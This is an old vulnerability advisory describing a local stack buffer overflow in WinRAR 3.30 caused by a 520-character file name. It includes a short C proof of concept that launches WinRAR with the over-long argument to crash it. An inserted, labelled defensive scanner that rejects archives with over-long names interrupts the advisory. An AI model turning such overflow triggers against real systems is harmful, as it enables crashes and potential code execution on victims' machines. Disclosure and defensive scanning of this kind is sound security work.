WinRAR Buffer Overflow Vulnerability in File Name
Source: Alpha_Programmer@LinuxMail.ORG  Author: Alpha  Published: 2006-01-04

Hello everybody

We found a vulnerability in WinRAR 3.30 that overruns the program on Windows platforms.

================================================
Synopsis: WinRAR Buffer Overflow Vulnerability in File Name
Product: WinRAR
Version: 3.30
Vendor: RARLab (http://www.rarlab.com)
Remote: No
Local: Yes
Discovery: Credited to Alpha Programmer & Trap-Set U.H Team
================================================

When WinRAR opens an archive that contains a long file name, a buffer overrun occurs on the stack.
This happens when we use 520 characters with Winrar.exe; it fills the saved return address (Ret) successfully.
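A defensive check for the condition described above, as an added example that is not part of the original advisory: it walks the block headers of a RAR 1.5-4.x archive and reports the longest NAME_SIZE declared by any file header, so a mail or upload filter can reject archives with over-long entry names before they reach an unpatched WinRAR. The function names, the 260-character limit (Windows MAX_PATH) and the constructed sample are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t le(const uint8_t *p, int n) { /* little-endian read */
    uint32_t v = 0;
    while (n--) v = (v << 8) | p[n];
    return v;
}

/* Longest file-header NAME_SIZE, or -1 if the block chain is malformed.
   Header CRCs are not verified; encrypted headers cannot be parsed. */
long rar_max_name_size(const uint8_t *buf, size_t len) {
    size_t off = 7;
    long max = 0;
    if (len < 7 || memcmp(buf, "Rar!\x1a\x07\x00", 7) != 0) return -1;
    while (off < len) {
        const uint8_t *h = buf + off;
        if (len - off < 7) return -1;
        uint32_t flags = le(h + 3, 2), head = le(h + 5, 2);
        if (head < 7 || head > len - off || ((flags & 0x8000) && head < 11)) return -1;
        uint64_t total = (uint64_t)head + ((flags & 0x8000) ? le(h + 7, 4) : 0);
        if (h[2] == 0x74) { /* file header; name follows the fixed fields */
            uint32_t base = (flags & 0x100) ? 40 : 32;
            if (head < base || le(h + 26, 2) > head - base) return -1;
            if ((long)le(h + 26, 2) > max) max = (long)le(h + 26, 2);
        }
        if (total > len - off) return -1; /* truncated archive */
        off += (size_t)total;
    }
    return max;
}

/* Constructed scanner input (zero CRCs): one file header, n-byte name. */
size_t make_sample(uint8_t *out, unsigned n) {
    memset(out, 0, 52);
    memcpy(out, "Rar!\x1a\x07\x00\0\0\x73\0\0\x0d", 13); /* marker + main header */
    out[22] = 0x74; out[24] = 0x80; /* file header type, flags = 0x8000 */
    out[25] = (uint8_t)(32 + n); out[26] = (uint8_t)((32 + n) >> 8); /* HEAD_SIZE */
    out[46] = (uint8_t)n; out[47] = (uint8_t)(n >> 8); /* NAME_SIZE */
    memset(out + 52, 'a', n);
    return 52 + n;
}

int main(void) { /* 260 (Windows MAX_PATH) is an assumed policy limit */
    uint8_t buf[1024];
    long n = rar_max_name_size(buf, make_sample(buf, 520));
    printf("longest name %ld: %s\n", n, (n < 0 || n > 260) ? "reject" : "accept");
    return 0;
}
```

A return value of -1 should be treated as a reject as well, since a header that cannot be walked cannot be cleared.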

================================================

A proof of concept for the overflow follows. Please execute it in the WinRAR 3.30 directory:

================================================
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <string.h>   /* memset(), strcat() */
#include <windows.h>

int main(void)
{
    char bad[1500] = "";
    char bad2[1500] = "WinRAR\t";

    printf("\t\t** Merry Christmas **\n\n");
    printf("\t\t Trap-Set U.H Team\n");
    printf(" \tWinRAR 3.30 Local Buffer Overflow\n");

    /* Build the 520-character argument */
    memset(bad, 'a', 520);

    /* Append it to the WinRAR command line */
    strcat(bad2, bad);
    printf("\nOver Running ... Just a Proof Of Concept . Not For Attacking !\n\n");
    printf("\tDiscovered By : Alpha Programmer\n");

    /* Run WinRAR with the over-long argument */
    system(bad2);

    return 0;
}
================================================

Tested on the WinXP SP 2 platform.

Special thanks to:

mh_p0rtal -- Dr-CephaleX

And : www.Couz.com Security Team

Contact:

Alpha_Programmer@LinuxMail.ORG

** Trap-Set U.H Team **
** Merry Christmas **

=================================================




 